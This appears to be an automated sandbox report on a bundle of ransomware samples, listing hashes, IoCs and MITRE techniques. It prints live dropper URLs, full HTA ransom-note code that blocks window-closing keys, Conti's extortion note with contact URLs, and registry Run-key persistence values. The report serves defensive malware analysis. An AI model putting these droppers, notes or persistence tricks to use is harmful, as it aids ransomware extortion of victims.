conti | cd48c2dd4c93c07a5cf6ef30063a35787c734e14d4917e5f7893ab28946e5290

Analysis

max time kernel
262s
max time network
380s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-10-2024 21:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00395.7z
Size

37.9MB
MD5

3415d869f43863503cfb7b4f0977f87f
SHA1

cbcc4f9b6662d47eee3806c86995611c16e7b8e6
SHA256

cd48c2dd4c93c07a5cf6ef30063a35787c734e14d4917e5f7893ab28946e5290
SHA512

b9ac597d32806e46a2a714158a07622cb28c96e09a79d3d7652532644d103c0e59bf1af1539d87a86bde9c8086bba8da0fe74882c07ab99973398e04a29706df
SSDEEP

786432:RGVRu1RAbmLqLDyhfq1ud+zfkesYMjCTZbqm/4kYT8to1:RG6I4Ah1u0rkDYyov/49t1

Score

10^/10

conti crylock dcrat dharma thanos vashsorena defense_evasion discovery evasion execution impact infostealer persistence pyinstaller ransomware rat upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://e-service.iag.bg/App_Themes/Efa/clear.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://e-service.iag.bg/App_Themes/Efa/video.mp4

Extracted

Family

crylock

Attributes

emails
[email protected]
ransomnote
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var ud=0; var op=0xc7bf30; var zoc=0; function document.onkeydown() { var alt=window.event.altKey; if (event.keyCode==116 || event.keyCode==27 || alt && event.keyCode==115) { event.keyCode=0; event.cancelBubble=true; return false; } } function document.onblur() { alert('Attention! This important information for you!'); } function ChangeTime() { var sd = new Date('<%DOUBLE_DATETIME%>'); var dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('pwr'); dt.innerHTML='<font color="red" size="5"><b>Price is raised!</b></font>'; dt.style.height=78; zoc=1; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('dt'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } var sd = new Date('<%UNDECRYPT_DATETIME%>'); dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('lctw'); dt.innerHTML='<font color="red" size="5"><b>Last chance to decrypt your files!</b></font>'; zoc=2; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('et'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { document.getElementById("blumid").focus(); var bid=document.getElementById('blumid'); var bem=document.getElementById('blummail'); if (ud==0) { op=op-0x10; } else { op=op+0x10; } if (op<=0xc00000) { ud=1; } if (op>=0xc7bf30) { ud=0; } bid.style.backgroundColor=op; bem.style.backgroundColor=op; var xx=''; var i=0; while (i<19) { xx=xx+getRandomArbitrary(0,2); i=i+1; } if (zoc==0) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="white" size="5"><b>'+xx+'</b></font>'; } else { if (zoc==1) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="5"><b>Price is raised!</b></font>'; } else { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="4"><b>Price is raised!<br>Last chance to decrypt your files!</b></font>'; } } } function Start() { window.resizeTo(800,500) setInterval(ChangeTime,1000); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background-color:#0066CC;" OnLoad="Start()"> <div id="pwr" align="center" style="position:absolute; top:10px; left:10px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Payment will be raised after</b></font> <br> <div id="dt"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div align="center" style="position:absolute; top:10px; left:170px; width:58%;"> <font face="monospace" color="white" size="4"><b>Your files have been encrypted...</b></font> </div> <div align="center" style="position:absolute; top:60px; left:170px; width:58%;"> <div id="rc"> <font face="monospace" color="white" size="5"><b>00000000000000000000</b></font> </div> </div> <div id="lctw" align="center" style="position:absolute; top:10px; left:620px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Your files will be lost after</b></font> <br> <div id="et"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div style="background-color:white;overflow-x:hide; overflow-y:scroll; position:absolute; top:100px; left:10px; width:768px; height:320px"> Decrypt files? Write to this mails: <font face="monospace" OnClick="copytext('<%MAIN_CONTACT%>')"><b><%MAIN_CONTACT%></b></font> or <font face="monospace" OnClick="copytext('<%RESERVE_CONTACT%>')"><b><%RESERVE_CONTACT%></b></font>. Telegram <font face="monospace" OnClick="copytext('https://t.me/assist_decoderr')"><b>https://t.me/assist_decoder</b></font>. <br> You unique ID <font face="monospace" OnClick="copytext('[<%HID%>]')"><b>[<%HID%>] <font size="2">[copy]</font></b></font> </div> <div title="Click to copy" OnClick="copytext('[<%HID%>]')" id="blumid" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:10px; width:380px; height:20px"> <b>Your ID [<%HID%>] <font size="2">[copy]</font></b> </div> <div title="Click to copy" OnClick="copytext('<%MAIN_CONTACT%>')" id="blummail" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:400px; width:380px; height:20px"> <b>Write to <%MAIN_CONTACT%> <font size="2">[copy]</font></b> </div> </body> </html>

rsa_pubkey.plain

Extracted

Path

C:\ProgramData\R3ADM3.txt

Family

conti

Ransom Note

All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion HTTPS VERSION : https://contirecovery.info YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- CaFGUkuxCokVJnZz1cVe9DtLJKZQghAJ2qT8Gw48hLhhW8YEcIGIUIZzVdTkgEJW ---END ID---

URLs

http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion

https://contirecovery.info

Extracted

Path

C:\ProgramData\info-decrypt.hta

Ransom Note

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'> <html> <head> <meta charset='windows-1251'> <title>encrypted!</title> <HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no"> <script language='JScript'> window.moveTo(50, 50); window.resizeTo(screen.width - 100, screen.height - 100); </script> <style type='text/css'> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background: #EDEDED; } img { display:inline-block; } .bold { font-weight: bold; } .mark { background: #D0D0E8; padding: 2px 5px; } .header { text-align: center; font-size: 30px; line-height: 50px; font-weight: bold; margin-bottom:20px; } .info { background: #D0D0E8; border-left: 10px solid #00008B; } .alert { background: #FFE4E4; border-left: 10px solid #FF0000; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note .title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note .mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } .footer { position:fixed; bottom:0; right:0; text-align: right; } </style> </head> <body> <div class='header'> <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII='> <div>All your files have been encrypted!</div> </div> <div class='bold'>All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail : <span class='mark'>[email protected]</span></div> <div class='bold'>Write this ID in the title of your message : <span class='mark'>E87CF400</span></div> <div class='bold'>In case of no answer in 12 hours write us to this e-mail : <span class='mark'>[email protected]</span></div> <div> You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. </div> <div class='note info'> <div class='title'>Free decryption as guarantee</div> <ul>Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) </ul> </div> <div class='note info'> <div class='title'>How to obtain Bitcoins</div> <ul> The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. <br><a href='https://localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a> <br> Also you can find other places to buy Bitcoins and beginners guide here: <br><a href='http://www.coindesk.com/information/how-can-i-buy-bitcoins/'>http://www.coindesk.com/information/how-can-i-buy-bitcoins/</a> </ul> </div> <div class='note alert'> <div class='title'>Attention!</div> <ul> <li>Do not rename encrypted files.</li> <li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li> <li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li> </ul> </div> </body> </html>

Emails

class='mark'>[email protected]</span></div>

URLs

http://www.w3.org/TR/html4/strict.dtd'>

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x000c000000023b3b-111.dat	disable_win_def

Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
ransomware conti
Conti family
conti
Crylock
Ransomware family, which is a new variant of Cryakl ransomware.
ransomware crylock
Crylock family
crylock
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Dharma family
dharma
Thanos Ransomware
Ransomware-as-a-service (RaaS) sold through underground forums.
ransomware thanos

Thanos executable 1 IoCs

resource	yara_rule
behavioral1/files/0x000c000000023b3b-111.dat	family_thanos_ransomware

Thanos family
thanos

VashSorena Golang binary 1 IoCs

resource	yara_rule
behavioral1/files/0x000b000000023b53-1127.dat	family_vashsorena

VashSorena Ransomware
Ransomware family with multiple versions/spinoffs. Decryption of files is generally possible without paying the ransom.
ransomware vashsorena
Vashsorena family
vashsorena

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/1080-2268-0x00000000007A0000-0x0000000000BE4000-memory.dmp	dcrat
behavioral1/memory/1080-2132-0x00000000007A0000-0x0000000000BE4000-memory.dmp	dcrat
behavioral1/memory/1080-75424-0x00000000007A0000-0x0000000000BE4000-memory.dmp	dcrat
behavioral1/memory/16492-75432-0x0000000000950000-0x0000000000D94000-memory.dmp	dcrat
behavioral1/memory/16492-75431-0x0000000000950000-0x0000000000D94000-memory.dmp	dcrat
behavioral1/memory/16492-75811-0x0000000000950000-0x0000000000D94000-memory.dmp	dcrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
8436	netsh.exe
9996	netsh.exe
8692	netsh.exe
16160	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	wmisecure64.exe

Executes dropped EXE 25 IoCs

pid	Process
2728	HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe
4188	HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d.exe
4116	GROWTO~2.EXE
2816	PDFs Importantes.exe
3324	wmiintegrator.exe
1208	wmihostwin.exe
4676	GROWTO~2.EXE
1592	wmimic.exe
4132	wmisecure.exe
2804	wmisecure64.exe
636	HEUR-Trojan-Ransom.Win32.Agent.gen-d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.exe
752	HEUR-Trojan-Ransom.Win32.Cryakl.gen-e298ac8c4975ff92788ee7049e39b047d0805c2513f7a5ca4b1e98f8b260b923.exe
3472	HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-70402de980d7cb82134f16705b21b15a381e988604ee1a0408640869437132e5.exe
2712	HEUR-Trojan-Ransom.Win32.Cryptor.gen-6ed577361d0db8b085c54efef19fec4055ecdaaaf65b7ec63134275d93d6f09b.exe
3496	HEUR-Trojan-Ransom.Win32.Encoder.gen-87023bcd5a3fd1b751c150b272ec9a2d1448de60710cc2c6d975b6dcef765881.exe
3360	HEUR-Trojan-Ransom.Win32.Foreign.vho-6ef4aa9ec54235327b67e5ecd91508db638318e572dd2e61a20c5b12b713267c.exe
4064	HEUR-Trojan-Ransom.Win32.Gen.gen-5dbfdec02487b7925e5b390c9d3141b051149364b755a8a2da406673a0c9f91f.exe
4868	HEUR-Trojan-Ransom.Win32.Generic-05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe
4736	HEUR-Trojan-Ransom.Win32.Shade.gen-1f58f9afa91db98e0d7d13ad5d42205f64714281b12e608820d222e95af22881.exe
512	Trojan-Ransom.MSIL.Xcrypto.d-20ff3ee05f1dffc81e04f2917f8e47d569c3c0b41145e1a8f95ab8c69d5259d3.exe
2576	Trojan-Ransom.Win32.Blocker.lckf-a66091d7ea74ec75541e89e299e55a585aec31e153ef4b367dec10babb76c5bc.exe
392	Trojan-Ransom.Win32.Crusis.to-3e7f30a802c595379ad3158ffe4ba5bc9e4a4d304430a2d846330adee70dc9a5.exe
4876	Trojan-Ransom.Win32.Cryptoff.ad-5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4.exe
1532	Trojan-Ransom.Win32.Cryptor.dri-64dd179bab62fb8b024a477e6d3b037895d2da1c3bd53c99d251960527203d9c.exe
4216	Trojan-Ransom.Win32.Encoder.kis-db157f4e2d83d24ebe29edc7557773b031f62371a12238fb1b523f0c14e65f85.exe

Loads dropped DLL 6 IoCs

pid	Process
4676	GROWTO~2.EXE
4676	GROWTO~2.EXE
4676	GROWTO~2.EXE
4676	GROWTO~2.EXE
4676	GROWTO~2.EXE
4676	GROWTO~2.EXE

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2472	takeown.exe
5628	takeown.exe
6332	takeown.exe
9736	takeown.exe
16884	takeown.exe
12860	takeown.exe
7880	takeown.exe
6224	takeown.exe

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000b000000023b5d-1141.dat	vmprotect
behavioral1/memory/4216-2301-0x0000000000400000-0x0000000000C85000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
12652	powershell.exe
6288	powershell.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3132	cmd.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3360-8081-0x0000000000400000-0x000000000046F000-memory.dmp	upx
behavioral1/memory/14820-75491-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/16304-75616-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/14268-75637-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/15260-75729-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/14820-75748-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5452-75762-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/12672-75805-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6532-75833-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/12924-75864-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4100-75901-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7424-75923-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7516-76038-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/14164-76056-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0008000000023cba-113.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
6980	1532	WerFault.exe
5204	16492	WerFault.exe	349

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-70402de980d7cb82134f16705b21b15a381e988604ee1a0408640869437132e5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Cryptor.gen-6ed577361d0db8b085c54efef19fec4055ecdaaaf65b7ec63134275d93d6f09b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Cryptoff.ad-5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Gen.gen-5dbfdec02487b7925e5b390c9d3141b051149364b755a8a2da406673a0c9f91f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PDFs Importantes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GROWTO~2.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmimic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Cryakl.gen-e298ac8c4975ff92788ee7049e39b047d0805c2513f7a5ca4b1e98f8b260b923.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Shade.gen-1f58f9afa91db98e0d7d13ad5d42205f64714281b12e608820d222e95af22881.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Crusis.to-3e7f30a802c595379ad3158ffe4ba5bc9e4a4d304430a2d846330adee70dc9a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GROWTO~2.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.lckf-a66091d7ea74ec75541e89e299e55a585aec31e153ef4b367dec10babb76c5bc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmiintegrator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.MSIL.Xcrypto.d-20ff3ee05f1dffc81e04f2917f8e47d569c3c0b41145e1a8f95ab8c69d5259d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Foreign.vho-6ef4aa9ec54235327b67e5ecd91508db638318e572dd2e61a20c5b12b713267c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Encoder.kis-db157f4e2d83d24ebe29edc7557773b031f62371a12238fb1b523f0c14e65f85.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmisecure.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmisecure64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmihostwin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
